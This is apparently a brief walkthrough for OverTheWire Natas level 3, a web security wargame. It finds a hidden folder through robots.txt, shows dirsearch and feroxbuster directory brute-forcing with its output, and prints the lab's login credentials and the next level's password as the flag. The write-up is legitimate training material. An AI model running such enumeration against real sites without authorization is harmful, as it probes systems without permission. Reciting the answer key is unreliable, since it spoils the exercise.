Natas
Level 03
soal
Username: natas3
URL: http://natas3.natas.labs.overthewire.org
solve
-
login with cred natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH
-
if you check the web you won't find a directory listing because the directory listing isn't there
-
u can check robots.txt first because show the allow and disallow path user agent
-
and Here I found the folder that was allowed, namely /s3cr3t/
- http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt # natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ
-
or use the tool bruteforce directory
echo -n 'natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH' | base64 # make the base64 for authentication dirsearch -u natas3.natas.labs.overthewire.org -e txt,html -u natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH feroxbuster -u http://natas3.natas.labs.overthewire.org -x .txt,.html -H "Authorization: Basic $(echo -n 'natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH' | base64)" # 200 GET 1l 1w 40c http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt # 200 GET 2l 4w 33c http://natas3.natas.labs.overthewire.org/robots.txt -
after u found the directory and the file u can curl the flag
curl http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt -u natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ
flag
QryZXc2e0zahULdHrtHxzyYkj59kUxLQ